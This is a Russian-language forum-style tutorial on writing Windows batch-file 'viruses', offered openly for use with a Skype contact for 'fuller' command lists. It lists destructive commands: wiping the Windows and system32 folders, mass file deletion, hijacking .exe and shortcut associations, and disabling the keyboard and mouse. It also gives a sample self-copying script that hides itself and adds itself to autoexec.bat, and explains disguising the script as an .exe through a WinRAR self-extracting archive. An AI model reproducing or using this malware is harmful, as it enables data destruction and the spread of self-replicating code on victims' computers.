И так начнем если вы хотите получить поддержку по написанию могу поделится по скайпу: alexey13711 Батник и как его создать?
1) Открываем блокнот и пишем там вирус
2) Жмем кнопку "Сохранить как" и выбираем формат " . " (все файлы)
3) Сохраняем и делаем из расширения .bat в .exe
Теперь все подробно роспишу
Для того чтоб компьютер понял задачу нужно писать комманды, каждая из них имеет свое значения вот несколько из них:
Date 12.05.15 -строка меняет дату(какой нибудь 15 год поставил и начнет каспер плакать что лицензия 5лет назад кончилась.ну и другие проги работающие по такому же принципу) Time 00:00 -я думаю понятно меняет время, можно любое задать attrib -a -s -h [файл.расш] - снимает атрибуты с файла: +-[a] - снять/убрать атрибут "НЕ ЗНАЮ Я КАКОЙ НО вроде Архивный" +-[ s ] - снять/убрать атрибут "Системный" +-[h] - снять/убрать атрибут "Скрытый" +-[r] - снять/убрать атрибут "Чтение" -меняет атрибут вашего файла на скрытый Echo c:(имя вашего файла).bat >>autoexec.bat -прописывает ваш файл в автозагрузку md md LAMER -понятно что создастся новая папка LAMER ,на первый взгляд не чего особенного. Щас исправим... открываем Exel в первой ячейке пишем md 1 и оттягиваем вниз хоть на тысячу---копируем это все в блокнот соответственно... дальше я думаю все понятно,смотря сколько папок будет создаваться ну и от мощности мошины .... assoc .exe=.mp3 -запускает все ексшники как музыка del c:Program Files/q -удаляет все файлы из указанной папки assoc .lnk=.txt -все ярлыки начнут открываться блокнотом del *.* /q -удаление всех файлов , останутся только те которые находятся в той же папке в которой был запущен erase %windir%*.* /q - банальное удаление файлов. erase %windir%system32*.* /q - банальное удаление файлов, хотя винду снесёт без проблем. erase %systemdrive%*.* /q - удаление системно важных скрытых файлов на системном диске. Хотя чтобы винда больше не запустилась никаким образом достаточно удалить файл ntldr и перегрузиться. regedit (путь к вашему файлу) - Добавляем информацию с вашего .reg файла в реестр. Существует ещё и команда reg с параметрами, но иногда проще создать отдельный .reg файл. Здесь фантазии может быть много... echo текст >(>>) файл - Добавляем записи в файл. Знак > создаёт новый файл с заданным текстом, >> добавляет уже в существующий файл. shutdown -r -f - Принудительно перезагружаем комп, несмотря на протесты системы. @echo off - запрещаем вывод команд на экран, в том числе и результатов их выполнения. color 40 - делаем фон файла красным, а буквы чёрными. label LAMER - команда label указанная без параметров переименовывает системный диск на заданное слово. rundll32 shell32.dll,Control_RunDLL hotplug.dll - диалоговое окно Отключение или извлечение аппаратного устройства rundll32 diskcopy,DiskCopyRunDll - вызов диалога "Копирование диска". rundll32 keyboard,disable - отключение клавиатуры, действует до следующей перезагрузки. rundll32 mouse,disable - отключение мыши вплоть до перезагрузки. rundll32 krnl386.exe,exitkernel - выгрузить ядро системы, выход из Windows. rundll32 mshtml.dll,PrintHTML "HtmlFileNameAndPath" - распечатать документ HTML, где "HtmlFileNameAndPath" - путь к файлу и его имя. rundll32 мсprint2.dll,RUNDLL_PrintTestPage - распечатать тестовую страницу на принтере. rundll32 netplwiz.dll,AddNetPlaceRunDll - вызов мастера подключения нового сетевого ресурса "Добавление в сетевое окружение". rundll32 rnaui.dll,RnaWizard - вызов мастера "Удаленный доступ к сети". rundll32 rnaui.dll,RnaWizard /1 - вызов мастера "Удаленный доступ к сети" без отображения начального окна. rundll32 shell,ShellExecute - открыть Проводник (папка "Рабочий стол"). rundll32 shell32,Control_RunDLL - открыть в Проводнике папку "Панель управления". rundll32 shell32,Control_RunDLL appwiz.cpl,,n - вызов диалогового окна "Установка и удаление программ", в котором будет открыта вкладка с номером "n" (от 1 до 3). rundll32 shell32,Control_RunDLL main.cpl @0 - открыть диалог "Свойства мыши". rundll32 shell32,Control_RunDLL main.cpl @1 - открыть диалог "Свойства клавиатуры". rundll32 shell32,Control_RunDLL main.cpl @2 - открыть папку "Принтеры". rundll32 SHELL32,SHHelpShortcuts_RunDLL PrintersFolder - открыть папку "Принтеры" (другой способ). rundll32 shell32,Control_RunDLL main.cpl @3 - открыть папку "Шрифты". rundll32 SHELL32,SHHelpShortcuts_RunDLL FontsFolder - открыть папку "Шрифты" (другой способ). rundll32 SHELL32,Control_RunDLL modem.cpl, add - открыть диалог "Свойства модема". rundll32 shell32,Control_RunDLL timedate.cpl - открыть диалог "Дата и время". rundll32 shell32,OpenAs_RunDLL - вызвать диалог "Открыть с помощью...". rundll32 shell32,ShellAboutA WINHOWTO.RU - информация о версии Windows. rundll32 shell32,SHExitWindowsEx 0 - закрыть все программы, перегрузить оболочку. rundll32 shell32, SHExitWindowsEx 1 - выключить ПК. rundll32 SHELL32, SHExitWindowsEx -1 - перегрузить оболочку Windows. rundll32 shell32, SHExitWindowsEx 2 - перегрузить ПК. rundll32 shell32,SHExitWindowsEx 4 - принудительно закрыть все программы. rundll32 shell32,SHExitWindowsEx 8 - выход из Windows и выключение ATX-совместимого ПК. rundll32 shell32,SHFormatDrive - вызов диалога форматирования диска А:. rundll32 SHELL32,SHHelpShortcuts_RunDLL AddPrinter - запуск "Мастера установки принтера". rundll32 shell32,SHHelpShortcuts_RunDLL Connect - запуск мастера подключения сетевого диска. rundll32 SHELL32,SHHelpShortcuts_RunDLL PrintTestPage - распечатать тестовую страницу. rundll32 sysdm.cpl,InstallDevice_Rundll - вызов мастера установки оборудования. rundll32 url.dll,FileProtocolHandler %1 - открыть веб-страницу, где %1 - URL сайта (включая [link=http://).]http://).[/link] rundll32 url.dll,MailToProtocolHandler %1 - создать новое письмо, где %1 - e-mail адресата. rundll32 user,CASCADECHILDWINDOWS - расположить все окна каскадом. rundll32 user,TILECHILDWINDOWS - расположить все окна по экрану. rundll32 user,disableoemlayer - сбой системы (!) - выключить все функции ввода-вывода (клавиатура, дисплей, мышь). В результате будет черный экран с курсором и ни на что не реагирующая система, однако Windows продолжает работать. rundll32 user,ExitWindowsExec - быстрая перезагрузка Windows. rundll32 user,RepaintScreen - выполнить команду "Обновить". rundll32 user,SetCaretBlinkTime n - задать частоту мигания курсора, соответствующую значению параметра n. rundll32 user,SetCursorPos - переместить курсор мыши в верхний левый угол экрана. rundll32 user,SetDoubleClickTime n - задать скорость двойного нажатия левой кнопки мыши (Double Click), соответствующую параметру n. rundll32 user,SwapMouseButton - поменять местами клавиши мыши (обратная смена невозможна). rundll32 user,WNetConnectDialog - вызов диалога "Подключение сетевого диска". rundll32 user,WNetDisconnectDialog - вызов диалога "Отключение сетевого диска". rundll32 AppWiz.Cpl,NewLinkHere %1 - запуск мастера создания нового ярлыка, где %1 - путь к исходному файлу.
Пример: @Echo off if exist c:virus.bat goto go {проверяем, существует ли файл, …} copy %0 c:virus.bat >nul attrib +h c:virus.bat >nul echo c:virus.bat>>c:autoexec.bat :go {…если он существует, то программа переходит на метку :go} copy %0 a:run.bat >nul
тут вирус проверяет существует ли файл c:virus.bat если да то переходит на метку go
if exist c:virus.bat - команда проверить существует ли файл c:virus.bat (вместо virus название вашого вируса)
Для начала потренируйтесь на етих командах а потом позвоните мне в скайпе и я отправлю вам полный список команд (мой скайп alexey13711)
Как с формата .bat зделать в .exe?
Ето очень просто! Для етого вам потребуется архиватор Вин Рар и мозг (1штука)
Для того чтобы сменить вормат вам надо взять готовый батник с расширением .bat м--► Жмем прав. кнопкой мыши и нажимаем "Создать архив" --► Ставим галочку создать "SFX-архив" --► прраметры SFX-архива --► и в строчку выполнить после распаковки пишем название своего вируса--►Жмем ок и готово!
Обезательно посмотрите продолжение!!! Там команды "повкуснее" и их почти нельзя вернуть. жмем на кнопку!
А здесь наша новая статья о командах.
жми
------------------------------------------------------------ Наши новые статьи:
|